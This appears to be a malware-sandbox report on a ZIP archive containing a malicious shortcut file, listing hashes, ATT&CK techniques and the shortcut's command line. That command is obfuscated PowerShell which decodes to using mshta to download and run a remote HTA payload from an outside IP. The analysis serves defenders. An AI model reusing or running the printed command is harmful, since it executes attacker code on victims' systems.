Malicious
Malicious

91b5adbc44940878e0ce84a7503865f7001b85[...]5d5.zip

ZIP Archive
|
MD5: 8312c1f0c1814049b91b2aeaa52eea4a
|
Size: 1.23 KB
|
application/zip

Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules5
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
8312c1f0c1814049b91b2aeaa52eea4a
Sha1
c1b01325dc6e4d896a2edd553e907de4645987d2
Sha256
0795450f0ad494abd58156c59cc1400a0784870ff54891872a56218dba21a7c4
Sha384
de82ef262ca3808c0da13c583cdde16223b90ae14a6372b9a4f6c6dd5b1a72cde3210cf236a9a2990a24ac62046eccf1
Sha512
21151582c31f6848e430e9ff66368d49c3164bbc814299a936c13b295c28001fc11c167f239fa4e3278597efb83b8dddc570ac65702e6e40f12e5678422d5c62
SSDeep
24:HNmDaJYMsS78CpAqDEC9CrzMHAT6PZtL6r/cIgpede21B1DaJl:tmuJ7sS7pAqDECkrJWZ6rWBkzuJl
TLSH
7D2192C415884E91FEA0AEE24ED849D864E6920457781F6E48A84F718B75BA04F0B1CF
File Structure
91b5adbc44940878e0ce84a7503865f7001b8591d3ac1acbfd95d391222ba5d5.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
91b5adbc44940878e0ce84a7503865f7001b8591d3ac1acbfd95d391222ba5d5.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ExecutionPolicy UnRestricted $U='l/th9Omd56i:s.7aP8p214j'; &(-join($U[(981-969),(468-453),(916-916)])) :. (-join($U[(981-969),(468-453),(916-916)])); :. ~~ (-join($U[(909-903),(981-969),(894-891),(-321+323),(468-453)])); foreach($P in @((613-610),(514-512),(-921+923),(955-937),(-92+103),(-511+512),(352-351),(902-882),(-487+504),(845-837),(697-684),(-151+171),(-209+213),(-200+209),(-671+684),(-283+303),(690-670),(481-468),(443-423),(658-650),(-483+503),(390-389),(-981+991),(577-570),(499-477),(504-489),(556-555),(-495+511),(208-203),(-907+911),(-232+236),(-831+850),(-752+766),(-276+284),(585-571),(539-518),(-131+144),(-687+690),(212-210),(-528+543))){$e+=$U[$P]}; ~~ $e;
91b5adbc44940878e0ce84a7503865f7001b8591d3ac1acbfd95d391222ba5d5.zip (1.23 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙